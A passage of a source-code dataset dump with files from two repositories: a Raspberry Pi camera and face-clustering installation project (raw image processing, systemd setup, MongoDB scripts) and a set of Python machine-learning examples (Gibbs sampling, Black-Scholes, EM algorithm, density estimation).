np.asarray(curve).astype(float)\n ys, xs = curve.T / 256\n z = np.polyfit(xs, ys, len(xs)-1)\n f = np.poly1d(z)\n out = f(x_values / in_range)\n out = np.maximum(out, 0)\n out **= 1/gamma\n out *= 256\n out = np.minimum(out, 255)\n lut.append(out)\n return np.asarray(lut).astype(np.uint8)\n\n@njit\ndef apply_lut(img16, img8, lut):\n h,w = img16.shape[:2]\n n = h * w\n img16_flat = img16.reshape(-1,3)\n img8_flat = img8.reshape(-1,3)\n for i in range(n):\n for j in range(3):\n img8_flat[i][j] = lut[j][img16_flat[i][j]]\n \n@njit\ndef remove_padding_and_unpack_quarter_bgr_preview(data, width, height, bit_width, out):\n \"\"\"Same as above, but at quarter resolution unpacked directly to BGR.\"\"\"\n real_width = width // 8 * bit_width\n align_width = align_up(real_width, 32)\n skip_length = align_width * 4\n jj = 0\n k = 0\n n = width//4\n for y in range(height//4):\n j = jj\n for x in range(width//4):\n out[k+0] = data[j]\n out[k+1] = data[j+1]\n out[k+2] = data[j+align_width+1]\n j += 5\n k += 3\n jj += skip_length\n\n@njit\ndef zebra(img, width, height):\n i = 0\n n = width * height * 3\n for y in range(height):\n for x in range(width//3):\n if img[i] == 255:\n img[i] = 0\n if img[i+1] == 255:\n img[i+1] = 0\n if img[i+2] == 255:\n img[i+2] = 0 \n i += 9\n i += 3\n if i > n:\n break\n\nclass RawProcessor:\n \"\"\"For 16-bit output leave 
curves=None.\"\"\"\n def __init__(self, width, height, curves=None, mode='bgr'):\n self.w = width\n self.h = height\n self.img16_bayer = np.zeros((height*width), np.uint16)\n self.img16 = np.zeros((height,width,3), np.uint16)\n self.lut = None\n if curves is not None:\n self.lut = curves_to_lut(curves, in_range=1024)\n self.img8_lut = np.zeros((height,width,3), np.uint8)\n self.mode = cv2.COLOR_BAYER_RG2BGR if mode == 'bgr' else cv2.COLOR_BAYER_RG2RGB\n \n def __call__(self, data):\n remove_padding_and_unpack_fast(data, self.w, self.h, 10, self.img16_bayer)\n cv2.cvtColor(self.img16_bayer.reshape(self.h, self.w), self.mode, self.img16)\n if self.lut is None:\n return self.img16\n apply_lut(self.img16, self.img8_lut, self.lut)\n return self.img8_lut" }, { "alpha_fraction": 0.8003220558166504, "alphanum_fraction": 0.8003220558166504, "avg_line_length": 19.37704849243164, "blob_id": "8f956d96d606c8b75e1d816f8f3020d938c8ded4", "content_id": "42b701d2c4edbcf65a0e933df43b9f908cc780d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1242, "license_type": "no_license", "max_line_length": 58, "num_lines": 61, "path": "/automate/setup-services.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "USER=$SUDO_USER\nSERVICES_DIR=/etc/systemd/system/\n\n# vibe-check-cluster\ncat >$SERVICES_DIR/vibe-check-cluster.service <<EOL\n[Unit]\nDescription=Vibe Check Cluster\nAfter=mongodb.service\n\n[Service]\nWorkingDirectory=/home/$USER/Documents/vibe-check/database\nExecStart=/home/$USER/Documents/vibe-check/database/run.sh\nUser=$USER\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target\nEOL\n\n# vibe-check-app\ncat >$SERVICES_DIR/vibe-check-app.service <<EOL\n[Unit]\nDescription=Vibe Check App\nAfter=mongodb.service\n\n[Service]\nWorkingDirectory=/home/$USER/Documents/vibe-check/app\nExecStart=/home/$USER/Documents/vibe-check/app/run.sh\nUser=$USER\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target\nEOL\n\n# vibe-check-face\ncat >$SERVICES_DIR/vibe-check-face.service <<EOL\n[Unit]\nDescription=Vibe Check Face\nAfter=mongodb.service\n\n[Service]\nWorkingDirectory=/home/$USER/Documents/vibe-check/face\nExecStart=/home/$USER/Documents/vibe-check/face/run.sh\nUser=$USER\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target\nEOL\n\nsystemctl daemon-reload\n\nsystemctl enable vibe-check-cluster\nsystemctl start vibe-check-cluster\n\nsystemctl enable vibe-check-app\nsystemctl start vibe-check-app\n\nsystemctl enable vibe-check-face\nsystemctl start vibe-check-face" }, { "alpha_fraction": 0.7219251394271851, "alphanum_fraction": 0.7219251394271851, "avg_line_length": 61.66666793823242, "blob_id": "df0356f38a10dc0b3422f4b1ba291cb25ab8ed67", "content_id": "40a0a91db0fc5550fdb417e11e714973bece4225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 187, "license_type": "no_license", "max_line_length": 63, "num_lines": 3, "path": "/database/copy-remote.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# rsync --progress -rav hek:~/Documents/vibe-check/app/images .\nssh hek \"mongodump -d vibecheck --collection raw --archive\" | \\\n mongorestore --drop --nsInclude vibecheck.raw --archive" }, { "alpha_fraction": 0.6504707932472229, "alphanum_fraction": 0.6839924454689026, "avg_line_length": 27.255319595336914, "blob_id": "98714b35fbe7b9f9d1891bee284ab688c0e7f4ed", "content_id": "4a13176941db4482d470537021505ccd58ef8edd", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2655, "license_type": "no_license", "max_line_length": 105, "num_lines": 94, "path": "/rpi/camera/capture-raw.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nfrom __future__ import print_function\nimport datetime\nimport sys\nimport json\n\ndef log(*args):\n print(str(datetime.datetime.now()), *args)\n sys.stdout.flush()\n\nfrom RawProcessor import RawProcessor, zebra, remove_padding_and_unpack_quarter_bgr_preview\nimport cv2\nimport numpy as np\nimport arducam_mipicamera as arducam\nimport v4l2\nimport os\nimport errno\nimport time\nimport sys\n\ndef mkdirp(dir_name):\n try:\n os.makedirs(dir_name)\n except OSError as exc: \n if exc.errno == errno.EEXIST and os.path.isdir(dir_name):\n pass\n\nlog('loading config')\n\n# empty default configuration\nconfig = {\n 'exposure': 1600\n}\n\n# custom configuration overrides defaults\nwith open('config.json') as f:\n config.update(json.load(f))\n\nif len(sys.argv) > 1:\n config['exposure'] = int(sys.argv[1])\n print('overriding exposure with', config['exposure'])\n\nwidth, height = 4656, 3496\nprocessor = RawProcessor(width, height, mode='bgr')\n\nlog('connecting to camera')\ncamera = arducam.mipi_camera()\ncamera.init_camera()\n\nlog('setting resolution')\ncamera.set_resolution(width, height)\nlog('setting exposure and white balance')\ncamera.software_auto_exposure(enable=False)\ncamera.software_auto_white_balance(enable=False)\ncamera.set_control(v4l2.V4L2_CID_EXPOSURE, config['exposure'])\ncamera.set_control(v4l2.V4L2_CID_FOCUS_ABSOLUTE, config['focus'])\n\n# while True:\n# log('capturing')\n# frame = camera.capture(encoding='raw')\n\n# log('processing image')\n# img = processor(frame.as_array)\n\n# clipping = np.sum(img == 1023)\n# pixels = width * height * 3\n# ratio = float(clipping) / pixels\n# log('percent clipping:', 100*ratio)\n\n# if ratio < 0.0001:\n# break\n\n# config['exposure'] = int(0.9 * config['exposure'])\n# camera.set_control(v4l2.V4L2_CID_EXPOSURE, config['exposure'])\n# log('clipping, decreasing exposure to', config['exposure'])\n\nmkdirp('../reference')\npreview = np.zeros((height//4, width//4, 3), np.uint8)\nfor i, bracket in enumerate((1.0,)): #(0.80, 1.00, 1.20)):\n exposure = int(bracket * config['exposure'])\n# for i, exposure in enumerate((25600, 12800, 6400, 3200)):\n camera.set_control(v4l2.V4L2_CID_EXPOSURE, exposure)\n time.sleep(1)\n log('bracketed exposure ', i, '=', exposure)\n frame = camera.capture(encoding='raw')\n\n remove_padding_and_unpack_quarter_bgr_preview(frame.as_array, width, height, 10, preview.reshape(-1))\n zebra(preview.reshape(-1), width//4, height//4)\n cv2.imwrite('../reference/preview.jpg', preview)\n\n frame.as_array.tofile('../reference/' + str(exposure) + '.raw')\n\nlog('exiting')\ncamera.close_camera()" }, { "alpha_fraction": 0.5884543657302856, "alphanum_fraction": 0.6443203091621399, "avg_line_length": 16.933332443237305, "blob_id": "df53077ba1f7920b31b7d648e8991c9bf72a592c", "content_id": "6bdd819a3e38e19be7fb87e6e2ca44aa5b490700", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 537, "license_type": "no_license", "max_line_length": 43, "num_lines": 30, "path": "/rpi/camera-functions.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# script configuration\nHOSTNAME_PREFIX=vibe-check-camera-\nHOSTNAME_SUFFIX=.local\nROOT_NAME=camera\n\n# automatically configured global 
variables\nSSH_FILE=\"$HOME/.ssh/id_rsa\"\nSCRIPT=`basename \"$0\"`\nif [ -z \"$IDS\" ]; then\n IDS=\"0 1 4 5 6 7 8 9 10 11\"\n # IDS=\"0 1 2 3 4 5 6 7 8 9 10 11\"\nfi\n\nfunction get_hostname() {\n ID=$1\n echo $HOSTNAME_PREFIX$ID\n}\n\nfunction get_address() {\n ID=$1\n echo `get_hostname $ID`$HOSTNAME_SUFFIX\n}\n\nfunction get_at() {\n ID=$1\n ADDRESS=`get_address $ID`\n echo pi@$ADDRESS\n}" }, { "alpha_fraction": 0.7267857193946838, "alphanum_fraction": 0.7392857074737549, "avg_line_length": 17.09677505493164, "blob_id": "d0344e42e431bcd16071e97f4b31998162ae84e6", "content_id": "cb9d45b63641248abdfb45f72f669255f394c1dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 560, "license_type": "no_license", "max_line_length": 71, "num_lines": 31, "path": "/app/readme.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Frontend Server\n\n* https://flask.palletsprojects.com/en/1.1.x/installation/#installation\n* https://flask-pymongo.readthedocs.io/en/latest/\n\nWith virtual environment:\n\n```\n. venv/bin/activate\nexport FLASK_APP=app.py\nexport FLASK_ENV=development # debug\ncd app\npython app.py\n```\n\nWith Anaconda:\n\n```\nconda create -y --name vibe-check-app --no-default-packages python=3.7\nconda activate vibe-check-app\nconda install -y flask==1.1.2\npython app.py\n```\n\nOr from the yml file:\n\n```\nconda env create -f environment.yml\nconda activate vibe-check-app\npython app.py\n```" }, { "alpha_fraction": 0.6450381875038147, "alphanum_fraction": 0.6564885377883911, "avg_line_length": 20.91666603088379, "blob_id": "24a1aac787fb8152f3df58af469daaf325166a34", "content_id": "73f613df05253ae66507e76db4268f3f4975a451", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 262, "license_type": "no_license", "max_line_length": 59, "num_lines": 12, "path": "/database/run.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/sh\nmin_interval=60\nwhile true\ndo\n start=`date +%s`\n ~/miniconda3/envs/vibe-check-face/bin/python cluster.py\n end=`date +%s`\n duration=$((end-start))\n echo $duration\" second\"\n remaining=$((min_interval-duration))\n sleep $remaining\ndone" }, { "alpha_fraction": 0.6052948236465454, "alphanum_fraction": 0.6161251664161682, "avg_line_length": 29.77777862548828, "blob_id": "482a09aacc5eeb70a071ea8a1106e4f8da634e7a", "content_id": "8547c60736040f9f07940a91794012e8ac3f1670", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1662, "license_type": "no_license", "max_line_length": 87, "num_lines": 54, "path": "/face/build-blocklist.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nfrom collections import defaultdict\nimport pickle\nfrom blocking import face_to_features\n\ncamera_count = 12\nmin_samples = 20\nmax_features = 1000\n\nclient = MongoClient()\nblocklist = defaultdict(list)\n\nfor camera_id in range(camera_count):\n print(f'analyzing camera {camera_id}')\n \n features = []\n for e in client.vibecheck.raw.find({'camera_id': str(camera_id)}):\n for face in e['faces']:\n features.append(face_to_features(face))\n \n print(f' face features: {len(features)}')\n if len(features) == 0:\n print(' skipping...')\n continue\n\n if len(features) > max_features:\n np.random.shuffle(features)\n features = features[:max_features]\n print(f' limited 
features: {max_features}')\n \n features = np.asarray(features)\n clusterer = DBSCAN(min_samples=min_samples)\n labels = clusterer.fit_predict(features)\n unique = np.unique(labels[labels != -1])\n \n print(f' unique clusters: {len(unique)}')\n if len(unique) == 0:\n print(' skipping...')\n continue\n \n for label in unique:\n in_group = features[labels == label]\n out_group = features[labels != label]\n mean = in_group.mean(0)\n farthest = np.sqrt((in_group - mean) ** 2).sum(1).max()\n nearest = np.sqrt((out_group - mean) ** 2).sum(1).min()\n print(' ', label, 'farthest', round(farthest,2), 'nearest', round(nearest, 2))\n \n blocklist[str(camera_id)].append(mean)\n\nwith open('blocklist.pkl', 'wb') as f:\n pickle.dump(dict(blocklist), f)\n" } ]
36
nyk510/machine-learning
https://github.com/nyk510/machine-learning
2035c620881e84f5924b25ea2b022eb40430d370
a3f2ce93937a9394e4985a39e4190faeb50d7df2
fc1c5d9ba59eb3d3663b7119f4b09527490b7144
refs/heads/master
2020-03-29T06:30:28.418021
2017-07-10T12:01:07
2017-07-10T12:01:07
94,658,275
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5447960495948792, "alphanum_fraction": 0.5722455382347107, "avg_line_length": 29.858823776245117, "blob_id": "dc861fb866e814927a82f507219ec92fdbc7526e", "content_id": "11eadb272b800b91f8e0cdacacdeb6b6408046c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2829, "license_type": "no_license", "max_line_length": 105, "num_lines": 85, "path": "/gibbs_sampling.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n__author__ = \"nyk510\"\n\"\"\"\n\"\"\"\n\n# coding: UTF-8\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n\ndef gibbs_sampling(nu, cov, sample_size):\n \"\"\"\n ギブスサンプリングを用いて与えられた共分散, 平均値を持つ\n 多次元ガウス分布からのサンプリングを行う関数\n :param np.ndarray nu: 平均値\n :param np.ndarray cov: 共分散\n :param int sample_size: サンプリングする数\n :return:\n :rtype: np.ndarray\n \"\"\"\n samples = []\n n_dim = nu.shape[0]\n # start point of sampling\n start = [0, 0]\n samples.append(start)\n search_dim = 0\n\n for i in range(sample_size):\n if search_dim == n_dim - 1:\n \"\"\"\n search dimension selection is cyclic.\n it can be replaced random choice.\n \"\"\"\n search_dim = 0\n else:\n search_dim = search_dim + 1\n\n prev_sample = samples[-1][:]\n A = cov[search_dim][search_dim - 1] / float(cov[search_dim - 1][search_dim - 1]) # A*Σ_yy = Σ_xy\n _y = prev_sample[search_dim - 1] # previous values of other dimension\n\n # p(x|y) ~ N(x|nu[x]+A(_y-nu[y]),Σ_zz)\n # Σ_zz = Σ_xx - A0*Σ_yx\n\n mean = nu[search_dim] + A * (_y - nu[search_dim - 1])\n sigma_zz = cov[search_dim][search_dim] - A * cov[search_dim - 1][search_dim]\n\n sample_x = np.random.normal(loc=mean, scale=np.power(sigma_zz, .5), size=1)\n prev_sample[search_dim] = sample_x[0]\n samples.append(prev_sample)\n\n return np.array(samples)\n\n\nif __name__ == '__main__':\n # 2 dimension normal distribution\n nu = np.ones(2)\n covariance = np.array([[0.5, 0.5], [0.5, 3]])\n\n # eig_values: 固有値\n # eig_vectors: 固有ベクトル\n eig_values, eig_vectors = np.linalg.eig(covariance)\n average_eigs = np.average(eig_values)\n sample = gibbs_sampling(nu, covariance, 1000)\n\n fig, ax1 = plt.subplots(figsize=(6, 6))\n ax1.scatter(sample[:, 0], sample[:, 1],\n marker=\"o\", facecolor=\"none\", alpha=1., s=30., edgecolor=\"C0\", label=\"Samples\"\n )\n\n # 答え合わせ\n # scipy.stats を用いて多次元ガウス分布の確率密度関数を計算\n multi_norm = stats.multivariate_normal(mean=nu, cov=covariance)\n X, Y = np.meshgrid(np.linspace(nu[0] - average_eigs * 2, nu[0] + average_eigs * 2, 1000),\n np.linspace(nu[1] - average_eigs * 2, nu[1] + average_eigs * 2, 1000))\n Pos = np.empty(X.shape + (2,))\n Pos[:, :, 0] = X\n Pos[:, :, 1] = Y\n Z = multi_norm.pdf(Pos)\n ax1.contour(X, Y, Z, colors=\"C0\", label=\"True Probability Density Function\")\n ax1.legend()\n ax1.set_title(\"Gibbs Sampling\")\n fig.tight_layout()\n fig.savefig(\"figures/gibbs_sampling.png\", dpi=150)\n" }, { "alpha_fraction": 0.5349586009979248, "alphanum_fraction": 0.5827966928482056, "avg_line_length": 31.939393997192383, "blob_id": "d3635e4a4eaa10cb7c64025cd3c4c1a48974d4ab", "content_id": "8ded3a1be69a10d3d37d1722659c68840a791d6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2210, "license_type": "no_license", "max_line_length": 147, "num_lines": 66, "path": "/black_scholes.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n__author__ = 
\"nyk510\"\n\"\"\"\nブラック–ショールズ方程式\nhttps://ja.wikipedia.org/wiki/%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E2%80%93%E3%82%B7%E3%83%A7%E3%83%BC%E3%83%AB%E3%82%BA%E6%96%B9%E7%A8%8B%E5%BC%8F\n\"\"\"\n\n# encoding:UTF-8\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n# 定数\nt = 0.\nS_0 = 100.\nK = 100.\nr = 0.03\nSIGMA = 0.30\nT = 1.\n\n# 解析解\nd = -(np.math.log(S_0 / K) + ((r - SIGMA * SIGMA / 2.) * T)) / (SIGMA * np.power(T, 0.5))\nV_c = S_0 * stats.norm.cdf(-d + SIGMA * np.power(T, .5)) - K * np.exp(-r * T) * stats.norm.cdf(-d)\nV_p = K * np.exp(-r * (T - t)) * stats.norm.cdf(d) - S_0 * stats.norm.cdf(d - SIGMA * np.power(T - t, 0.5))\n\n\ndef black_scholes_monte_carlo(repeat):\n rand_n = np.random.normal(size=repeat)\n s_j_t = S_0 * np.exp((r - SIGMA * SIGMA / 2.) * T + SIGMA * rand_n * np.power(T, 0.5))\n return (np.sum(s_j_t[s_j_t > S_0] - S_0)) / float(repeat) * np.exp(-r * T)\n\n\ndef price_monte_carlo(repeat):\n rand_n = np.random.normal(size=repeat)\n s_j_t = S_0 * np.exp((r - SIGMA * SIGMA / 2.) * T + SIGMA * rand_n * np.power(T, 0.5))\n return s_j_t\n\n\nif __name__ == '__main__':\n\n print(V_c, \"Call Option: Analytical Solution\")\n print(V_p, \"Put Option: Analytical Solution\")\n sol_list = []\n repeat_num = []\n for i in range(15):\n repeat = pow(2, i)\n monte_sol = black_scholes_monte_carlo(repeat)\n print(monte_sol, repeat, \"Monte Carlo Solution: d=\", V_c - monte_sol)\n sol_list.append(np.abs(V_c - monte_sol) / abs(V_c))\n repeat_num.append(repeat)\n plt.semilogx(repeat_num, sol_list)\n plt.yscale(\"log\")\n plt.xlabel(\"Num of Repeats\")\n plt.ylabel(\"Error Ratio\")\n plt.show()\n\n sample_num = 10000\n price = price_monte_carlo(sample_num)\n VaR = S_0 - np.percentile(price, 1)\n put_values = price[:]\n put_values[put_values > S_0] = S_0\n put_values = S_0 + S_0 - put_values\n put_VaR = S_0 + V_p - np.percentile(put_values, 1)\n monte_carlo_V_p = np.sum(put_values - S_0) / float(sample_num) * np.exp(-r * T)\n print(\"Put Option Value(monte carlo):\\t\", monte_carlo_V_p)\n print(\"default VaR:\\t\", VaR, \"\\r\\nput option VaR:\\t\", put_VaR)\n" }, { "alpha_fraction": 0.5430711507797241, "alphanum_fraction": 0.5589036345481873, "avg_line_length": 33.552940368652344, "blob_id": "df9f520c2a9e086238c50aec029bd7cf0a393b87", "content_id": "e6e9e188c44307a5ad7bcdd537d45071d0c8a2dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6066, "license_type": "no_license", "max_line_length": 113, "num_lines": 170, "path": "/prml/em_algorithm.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n__author__ = \"nyk510\"\n\"\"\"\nEMアルゴリズム\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nfrom logging import getLogger, StreamHandler\n\nlogger = getLogger(__name__)\nstream_hander = StreamHandler()\nlogger.setLevel(\"INFO\")\nstream_hander.setLevel(\"INFO\")\nlogger.addHandler(stream_hander)\n\n\nclass EMAlgorithm():\n def __init__(self, num_classes, features):\n \"\"\"\n constructor\n :param int num_classes: 分離するクラスの数. \n :param np.ndarray features:\n 特徴量データ. 
shape = (n_samples, n_dims)\n \"\"\"\n self.class_num = num_classes\n self.features = features\n n_samples, dim = features.shape\n\n self.n_dimensions = dim\n self.n_samples = n_samples\n\n # 混合係数\n self.responsibility = np.empty((self.n_samples, num_classes), dtype=float)\n self.nu_list = []\n self.sigma_list = []\n self.pi_list = []\n for i in range(num_classes):\n # 平均値はrandom_uniform,分散は単位行列\n self.nu_list.append(np.random.uniform(low=-1, high=1.0, size=dim))\n self.sigma_list.append(np.eye(dim))\n self.pi_list.append(1. / dim)\n\n self.n_iter = 0\n self.previous_likelihood = self.compute_log_likelihood()\n self.nu_path = []\n\n def _e_step(self):\n \"\"\"\n 混合係数の更新\n \"\"\"\n for n, coodinate in enumerate(self.features):\n resp = np.zeros(self.class_num) # 初期化\n for k in range(self.class_num):\n var = stats.multivariate_normal(mean=self.nu_list[k], cov=self.sigma_list[k])\n dense = var.pdf(coodinate)\n resp[k] = (self.pi_list[k] * dense)\n self.responsibility[n, :] = resp / sum(resp)\n return\n\n def _m_step(self):\n \"\"\"\n do m_step\n m_step is constructed 3 sequences.\n 1: update new nu_list\n 2: update new sigma_list using new nu_list\n 3: update new responsibility using old pi_list\n \"\"\"\n N_k_list = np.zeros(self.class_num)\n for k in range(self.class_num):\n N_k = sum(self.responsibility[:, k])\n N_k_list[k] = N_k\n\n # step1 update nu_list\n self.nu_path.append(self.nu_list[:])\n for k in range(self.class_num):\n new_nu = np.zeros(self.n_dimensions)\n for n in range(self.n_samples):\n new_nu += self.responsibility[n, k] * self.features[n, :]\n self.nu_list[k] = new_nu / N_k_list[k]\n\n # step2\n for k in range(self.class_num):\n new_sigma_k = np.zeros((self.n_dimensions, self.n_dimensions))\n for n in range(self.n_samples):\n array_x = (self.features[n, :] - self.nu_list[k])[:, np.newaxis] # ベクトルの転置計算のためにいったん行列に変形\n new_sigma_k += self.responsibility[n, k] * array_x.dot(array_x.T)\n self.sigma_list[k] = new_sigma_k / N_k_list[k]\n\n # step3\n for k in range(self.class_num):\n self.pi_list = N_k_list / sum(N_k_list)\n return\n\n def compute_log_likelihood(self):\n \"\"\"\n calculate log likelihood. 
using current nu,sigma,pi,and data\n \"\"\"\n retval = 0.\n for n in range(self.n_samples):\n inside_log = 0.\n for k in range(self.class_num):\n multi_n = stats.multivariate_normal(mean=self.nu_list[k], cov=self.sigma_list[k])\n dense_x = multi_n.pdf(self.features[n])\n inside_log += dense_x * self.pi_list[k]\n retval += np.log(inside_log)\n n_iter = self.n_iter\n logger.info(\"log-likelihood: {retval:.3f}\\titer: {n_iter}\".format(**locals()))\n return retval\n\n @property\n def is_terminated(self):\n \"\"\"\n whether the EM algorithm is terminated or not\n return: boolean\n \"\"\"\n e = 1e-5\n current_likelihood = self.compute_log_likelihood()\n dist = current_likelihood - self.previous_likelihood\n kaizen_ratio = np.abs(dist / current_likelihood)\n\n if kaizen_ratio < e:\n logger.info(\"Complete!\")\n return True\n self.previous_likelihood = current_likelihood\n return False\n\n def run(self, repeat=10, force_update=True):\n \"\"\"\n lunch algorithm\n doing while is_terminated is true or repeat times over setted repeat number\n :param int repeat: 繰り返し回数\n :param bool force_update: 更新を強制的に繰り返し回数だけ行うかどうか.\n :return:\n \"\"\"\n for i in range(1, repeat + 1):\n self._e_step()\n self._m_step()\n self.n_iter = i\n\n if (~force_update) and self.is_terminated:\n logger.info(\"objective is terminated\")\n return\n return\n\n\ndef generate_samples():\n sample = np.random.multivariate_normal(mean=[0.5, 0], cov=np.array([[13, -9], [-27, 31]]) / 400., size=100)\n sample2 = np.random.multivariate_normal(mean=[0., 0.], cov=np.array([[5, 3], [3, 5]]) / 40., size=200)\n sample3 = np.random.multivariate_normal(mean=[-1, -0.], cov=np.array([[13, -9], [-27, 31]]) / 400., size=100)\n data = np.vstack([sample, sample2, sample3])\n return data\n\n\nif __name__ == '__main__':\n data = generate_samples()\n model = EMAlgorithm(3, data)\n model.run(repeat=100)\n plt.scatter(data[:, 0], data[:, 1], s=40, c=model.responsibility, alpha=.5, facecolors='none',\n edgecolor=model.responsibility)\n # plt.plot(np.array(em_alg.nu_list)[:, 0], np.array(em_alg.nu_list)[:, 1], \"rh\", markersize=10)\n path = np.array(model.nu_path)\n for k in range(model.class_num):\n c = [0, 0, 0]\n c[k] = 1\n plt.plot(path[:, k, 0], path[:, k, 1], \"*-\", color=c, label=\"class{k} center\".format(**locals()))\n plt.legend()\n plt.savefig(\"../figures/em_algorithm.png\", dpi=150)\n plt.show()\n" }, { "alpha_fraction": 0.7392491698265076, "alphanum_fraction": 0.7474402785301208, "avg_line_length": 21.538461685180664, "blob_id": "60a0a32da32271810d1759ee691257a048947171", "content_id": "6f2f2013821e50ff515795543c830590b466f107", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2519, "license_type": "no_license", "max_line_length": 68, "num_lines": 65, "path": "/readme.md", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# Machine Learning\n\n機械学習に関する python ファイルをまとめていくリポジトリ.\n\n## 環境\n\n* Python 3.6.0 :: Anaconda 4.3.0 (x86_64)\n\n## requirements\n\n* numpy\n* scipy\n* scikit-learn\n* matplotlib\n\n## Contents\n\n### サンプリング\n\n#### [gibbs sampling による多次元ガウス分布のサンプリング](gibbs_sampling.py)\n\n二次元ガウス分布に対するギブスサンプリング\n\n![](./figures/gibbs_sampling.png)\n\n### PRML\n\n#### [カーネル密度推定](./prml/density_estimation.py)\n\n一次元データ(図中でヒストグラムで表現されている)に対してカーネル幅の異なるカーネルを用いたときの密度推定の可視化\n![](./figures/density_estimation.png)\n\n#### 
[線形回帰モデルに対するエビデンス最大化](./prml/linear_regression.py)\nエビデンス最大化を用いた、線形回帰モデルの精度パラメータ及び重みの事前分布を決める係数の最適化。\n最適化を行った予測(左図)では、Map推定(右図)したときのように過学習しない様子を可視化しています。\n![](./figures/linear_regression_max-evidence_vs_normal-map.png)\n\n#### [ガウス過程 > 事前分布](./prml/gaussian_process_prior.py)\n\nガウス過程でデータが得られていないときの重みの事前分布からの確率過程のサンプリング\n![](./figures/gp_prior.png)\n\n#### [ガウス過程 > 新しいデータに対する予測](./prml/gaussian_process_estimation.py)\nガウス過程に基づく予測。\nデータが増えると予測の分散も減っていく様子を可視化しています。\n![](./figures/gp-estimation_by_training_data.png)\n\n#### [RVM (Relevant Vector Machine)](./prml/rvm.py)\n信頼ベクトルマシン(RVM)を用いた予測。\nプラスして信頼区間、およびサポートベクトルも表示\b。\n![](./figures/rvm_predict.png)\n\n#### [EM Algorithm](./prml/em_algorithm.py)\nEMアルゴリズムを用いた教師なし学習。\nデータは3つの平均と分散の異なる二次元ガウス分布から生成し、それを3つのクラスタに分類。\n![](./figures/em_algorithm.png)\n\n#### [Variance Inference](./prml/variance_inference.py)\n\n線形回帰モデルに対するエビデンス最大化の発展で、代わりに変分推論を行った結果の可視化。(あまり綺麗に結果に出ていないので今後治したい…)\n![](./figures/iter_update_beta.png)\n\n### その他\n\n* [black sholes 方程式](./black_scholes.py)\n" }, { "alpha_fraction": 0.5104318261146545, "alphanum_fraction": 0.5351771116256714, "avg_line_length": 25.088607788085938, "blob_id": "a7158dadd7fea8cb37da239ea8ff6a7142a8e9df", "content_id": "74a6d3163e05091f7cb0afd37df1c5f7d30d1d76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2083, "license_type": "no_license", "max_line_length": 94, "num_lines": 79, "path": "/prml/density_estimation.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\"\"\"\nカーネル密度推定\n@section 2\n\"\"\"\n\n__author__ = \"nyk510\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import multivariate_normal\n\n\nclass KernelEstimation():\n def __init__(self, h, dist, kernel):\n self.h = h\n self.dist = dist\n self.kernel = kernel\n\n self.data = None\n self.norm_ratio = None\n\n def __str__(self):\n s = \"kernel: {0.kernel} h: {0.h:.2f}\".format(self)\n return s\n\n def _kernel(self, d):\n \"\"\"\n return kernel distance\n \"\"\"\n if self.kernel == \"gaussian\":\n norm = np.linalg.norm(d)\n return np.exp(- norm ** 2. / (2. * self.h ** 2.))\n return 0\n\n def _calculate_normalization_ratio(self):\n \"\"\"\n calculate normalization ratio\n \"\"\"\n if self.kernel == \"gaussian\":\n return 1 / np.power((2 * self.h ** 2. 
